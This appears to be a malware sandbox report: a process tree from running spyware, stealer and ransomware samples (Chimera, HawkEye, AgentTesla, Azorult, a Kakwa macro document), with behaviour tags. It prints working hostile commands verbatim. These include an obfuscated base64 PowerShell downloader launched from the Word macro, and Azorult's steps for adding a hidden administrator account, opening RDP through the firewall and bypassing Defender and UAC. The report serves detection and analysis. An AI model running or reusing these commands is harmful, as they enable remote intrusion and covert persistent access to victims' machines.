C:\Users\Admin\AppData\Local\Temp\is-0C6KT.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-0C6KT.tmp\butterflyondesktop.tmp" /SL5="$20408,2719719,54272,C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"3⤵
- Chimera
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -k "C:\Users\Admin\Downloads\YOUR_FILES_ARE_ENCRYPTED.HTML"4⤵
- Modifies Internet Explorer settings
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -- "file:///C:/Users/Admin/Downloads/YOUR_FILES_ARE_ENCRYPTED.HTML"5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff9b4233cb8,0x7ff9b4233cc8,0x7ff9b4233cd86⤵
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff9b4233cb8,0x7ff9b4233cc8,0x7ff9b4233cd84⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Spyware\HawkEye.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Spyware\HawkEye.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Spyware\Kakwa.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C p^ow^Ers^HE^lL -e WwBzAFkAUwBUAGUATQAuAFQARQB4AHQALgBFAE4AYwBvAGQASQBuAEcAXQA6ADoAVQBuAEkAYwBvAGQAZQAuAEcARQBUAHMAVAByAEkAbgBHACgAWwBTAHkAcwB0AGUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgByAG8AbQBCAEEAUwBFADYANABzAHQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAEEAQQBPAHcAQQBnAEEAQwBRAEEAYQBRAEEAcgBBAEMAcwBBAEsAUQBBAGcAQQBIAHMAQQBKAEEAQgBwAEEAQwB3AEEASQBnAEIAZwBBAEcANABBAEkAZwBCADkAQQBIADAAQQBZAHcAQgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBBAGcAQQBHAFkAQQBkAFEAQgB1AEEARwBNAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAGcAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAZwBBAEkAQQBBAGsAQQBIAFUAQQBZAFEAQgAyAEEASABVAEEASQBBAEEAcwBBAEMAQQBBAEoAQQBCAHcAQQBIAFkAQQBhAEEAQgBuAEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBCAHAAQQBFADAAQQBjAEEAQgB2AEEARgBJAEEAZABBAEEAdABBAEUAMABBAFQAdwBCAEUAQQBGAFUAQQBUAEEAQgBsAEEAQwBBAEEAUQBnAEIASgBBAEgAUQBBAGMAdwBCAFUAQQBIAEkAQQBRAFEAQgB1AEEARgBNAEEAUgBnAEIAbABBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBjAHcAQgAwAEEARwBFAEEAVQBnAEIAMABBAEMAMABBAFkAZwBCAHAAQQBIAFEAQQBVAHcAQgBVAEEASABJAEEAUQBRAEIATwBBAEYATQBBAFIAZwBCAGwAQQBGAEkAQQBJAEEAQQB0AEEASABNAEEAVAB3AEIAMQBBAEYASQBBAFkAdwBCAEYAQQBDAEEAQQBKAEEAQgAxAEEARwBFAEEAZABnAEIAMQBBAEMAQQBBAEwAUQBCAGsAQQBFAFUAQQBjAHcAQgBVAEEARwBrAEEAVABnAEIAaABBAEgAUQBBAFMAUQBCAHYAQQBHADQAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBBAGcAQQBDAFkAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBCADkAQQBBADAAQQBDAGcAQgAwAEEASABJAEEAZQBRAEIANwBBAEMAUQBBAFoAQQBCADQAQQBIAG8AQQBaAGcAQgA0AEEASABNAEEAYgBnAEIAcQBBAEgAZwBBAFAAUQBCAGIAQQBFAFUAQQBUAGcAQgAyAEEARQBrAEEAVQBnAEIAdgBBAEUANABBAGIAUQBCAEYAQQBHADQAQQBkAEEAQgBkAEEARABvAEEATwBnAEIAbgBBAEUAVQBBAGQAQQBCAEcAQQBHADgAQQBUAEEAQgBFAEEARQBVAEEAYwBnAEIAUQBBAEUARQBBAFYAQQBCAG8AQQBDAGcAQQBKAHcAQgBOAEEARgBrAEEAUgBBAEIAUABBAEcATQBBAFYAUQBCAE4AQQBHAFUAQQBUAGcAQgBVAEEASABNAEEASgB3AEEAcABBAEMAcwBBAEoAdwBCAGMAQQBIAFUAQQBhAGcAQgBvAEEARwA0AEEAWQB3AEIAcgBBAEcARQBBAGEAdwBCADMAQQBHAEUAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEQAcwBBAEQAUQBBAEsAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFoAUQBCAG4AQQBHAEUAQQBZAGcAQgA1AEEASABRAEEAWgBRAEIAdABBAEcARQBBAGIAZwBCADAAQQBHADgAQQBiAFEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMAOABBAGIAQQBCADEAQQBHAE0AQQBhAHcAQQB2AEEASABJAEEAWgBRAEIAdABBAEgASQBBAFkAUQBCAGgAQQBIAFEAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAGsAQQBIAGcAQQBlAGcAQgBtAEEASABnAEEAYwB3AEIAdQBBAEcAbwBBAGUAQQBBADcAQQBBADAAQQBDAGcAQQBrAEEARwA0AEEAYQBnAEIAbgBBAEgARQBBAGUAZwBCAHkAQQBEADAAQQBXAHcAQgBGAEEARwA0AEEAZABnAEIAcABBAEgASQBBAFQAdwBCAHUAQQBFADAAQQBaAFEAQgBPAEEASABRAEEAWABRAEEANgBBAEQAbwBBAFoAdwBCAEYAQQBIAFEAQQBaAGcAQgBQAEEARwB3AEEAWgBBAEIAbABBAEYASQBBAGMAQQBCAEIAQQBIAFEAQQBTAEEAQQBvAEEAQwBjAEEAVABRAEIAWgBBAEgAQQBBAGEAUQBCAEQAQQBGAFEAQQBWAFEAQgB5AEEARQBVAEEAVQB3AEEAbgBBAEMAawBBAEsAdwBBAG4AQQBGAHcAQQBhAEEAQgBoAEEARwBvAEEAWQBRAEIAQQBBAEcARQBBAGMAdwBCAG8AQQBHAEUAQQBhAEEAQgBoAEEASABNAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBEAHMAQQBEAFEAQQBLAEEASABrAEEAWgBRAEIAdABBAEcAUQBBAGEAZwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBaAFEAQgBuAEEARwBFAEEAWQBnAEIANQBBAEgAUQBBAFoAUQBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBiAEEAQgAxAEEARwBNAEEAYQB3AEEAdgBBAEgAQQBBAFkAUQBCAHkAQQBHAEUAQQBZAFEAQgAwAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBiAGcAQgBxAEEARwBjAEEAYwBRAEIANgBBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBmAFEAQgBqAEEARwBFAEEAZABBAEIAagBBAEcAZwBBAGUAdwBCADkAQQBBAD0APQAiACkAKQB8AEkARQBYAA==2⤵
- Process spawned unexpected child process
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowErsHElL -e WwBzAFkAUwBUAGUATQAuAFQARQB4AHQALgBFAE4AYwBvAGQASQBuAEcAXQA6ADoAVQBuAEkAYwBvAGQAZQAuAEcARQBUAHMAVAByAEkAbgBHACgAWwBTAHkAcwB0AGUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgByAG8AbQBCAEEAUwBFADYANABzAHQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAEEAQQBPAHcAQQBnAEEAQwBRAEEAYQBRAEEAcgBBAEMAcwBBAEsAUQBBAGcAQQBIAHMAQQBKAEEAQgBwAEEAQwB3AEEASQBnAEIAZwBBAEcANABBAEkAZwBCADkAQQBIADAAQQBZAHcAQgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBBAGcAQQBHAFkAQQBkAFEAQgB1AEEARwBNAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAGcAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAZwBBAEkAQQBBAGsAQQBIAFUAQQBZAFEAQgAyAEEASABVAEEASQBBAEEAcwBBAEMAQQBBAEoAQQBCAHcAQQBIAFkAQQBhAEEAQgBuAEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBCAHAAQQBFADAAQQBjAEEAQgB2AEEARgBJAEEAZABBAEEAdABBAEUAMABBAFQAdwBCAEUAQQBGAFUAQQBUAEEAQgBsAEEAQwBBAEEAUQBnAEIASgBBAEgAUQBBAGMAdwBCAFUAQQBIAEkAQQBRAFEAQgB1AEEARgBNAEEAUgBnAEIAbABBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBjAHcAQgAwAEEARwBFAEEAVQBnAEIAMABBAEMAMABBAFkAZwBCAHAAQQBIAFEAQQBVAHcAQgBVAEEASABJAEEAUQBRAEIATwBBAEYATQBBAFIAZwBCAGwAQQBGAEkAQQBJAEEAQQB0AEEASABNAEEAVAB3AEIAMQBBAEYASQBBAFkAdwBCAEYAQQBDAEEAQQBKAEEAQgAxAEEARwBFAEEAZABnAEIAMQBBAEMAQQBBAEwAUQBCAGsAQQBFAFUAQQBjAHcAQgBVAEEARwBrAEEAVABnAEIAaABBAEgAUQBBAFMAUQBCAHYAQQBHADQAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBBAGcAQQBDAFkAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBCADkAQQBBADAAQQBDAGcAQgAwAEEASABJAEEAZQBRAEIANwBBAEMAUQBBAFoAQQBCADQAQQBIAG8AQQBaAGcAQgA0AEEASABNAEEAYgBnAEIAcQBBAEgAZwBBAFAAUQBCAGIAQQBFAFUAQQBUAGcAQgAyAEEARQBrAEEAVQBnAEIAdgBBAEUANABBAGIAUQBCAEYAQQBHADQAQQBkAEEAQgBkAEEARABvAEEATwBnAEIAbgBBAEUAVQBBAGQAQQBCAEcAQQBHADgAQQBUAEEAQgBFAEEARQBVAEEAYwBnAEIAUQBBAEUARQBBAFYAQQBCAG8AQQBDAGcAQQBKAHcAQgBOAEEARgBrAEEAUgBBAEIAUABBAEcATQBBAFYAUQBCAE4AQQBHAFUAQQBUAGcAQgBVAEEASABNAEEASgB3AEEAcABBAEMAcwBBAEoAdwBCAGMAQQBIAFUAQQBhAGcAQgBvAEEARwA0AEEAWQB3AEIAcgBBAEcARQBBAGEAdwBCADMAQQBHAEUAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEQAcwBBAEQAUQBBAEsAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFoAUQBCAG4AQQBHAEUAQQBZAGcAQgA1AEEASABRAEEAWgBRAEIAdABBAEcARQBBAGIAZwBCADAAQQBHADgAQQBiAFEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMAOABBAGIAQQBCADEAQQBHAE0AQQBhAHcAQQB2AEEASABJAEEAWgBRAEIAdABBAEgASQBBAFkAUQBCAGgAQQBIAFEAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAGsAQQBIAGcAQQBlAGcAQgBtAEEASABnAEEAYwB3AEIAdQBBAEcAbwBBAGUAQQBBADcAQQBBADAAQQBDAGcAQQBrAEEARwA0AEEAYQBnAEIAbgBBAEgARQBBAGUAZwBCAHkAQQBEADAAQQBXAHcAQgBGAEEARwA0AEEAZABnAEIAcABBAEgASQBBAFQAdwBCAHUAQQBFADAAQQBaAFEAQgBPAEEASABRAEEAWABRAEEANgBBAEQAbwBBAFoAdwBCAEYAQQBIAFEAQQBaAGcAQgBQAEEARwB3AEEAWgBBAEIAbABBAEYASQBBAGMAQQBCAEIAQQBIAFEAQQBTAEEAQQBvAEEAQwBjAEEAVABRAEIAWgBBAEgAQQBBAGEAUQBCAEQAQQBGAFEAQQBWAFEAQgB5AEEARQBVAEEAVQB3AEEAbgBBAEMAawBBAEsAdwBBAG4AQQBGAHcAQQBhAEEAQgBoAEEARwBvAEEAWQBRAEIAQQBBAEcARQBBAGMAdwBCAG8AQQBHAEUAQQBhAEEAQgBoAEEASABNAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBEAHMAQQBEAFEAQQBLAEEASABrAEEAWgBRAEIAdABBAEcAUQBBAGEAZwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBaAFEAQgBuAEEARwBFAEEAWQBnAEIANQBBAEgAUQBBAFoAUQBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBiAEEAQgAxAEEARwBNAEEAYQB3AEEAdgBBAEgAQQBBAFkAUQBCAHkAQQBHAEUAQQBZAFEAQgAwAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBiAGcAQgBxAEEARwBjAEEAYwBRAEIANgBBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBmAFEAQgBqAEEARwBFAEEAZABBAEIAagBBAEcAZwBBAGUAdwBCADkAQQBBAD0APQAiACkAKQB8AEkARQBYAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Spyware\AgentTesla.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Spyware\AgentTesla.exe"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Spyware\The Worst Of All!!!!!!\BonziBUDDY!!!!!!.txt1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Stealer\Azorult.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Stealer\Azorult.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Hide Artifacts: Hidden Users
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "4⤵
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
-
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵
- Launches sc.exe
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "6⤵
- Modifies registry class
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵
- Remote Service Session Hijacking: RDP Hijacking
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵
- Remote Service Session Hijacking: RDP Hijacking
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵
- Hide Artifacts: Hidden Users
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited10⤵
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1234⤵
- Executes dropped EXE
-
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3B61.tmp\3B62.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list7⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns6⤵
- Gathers network information
-
-
-
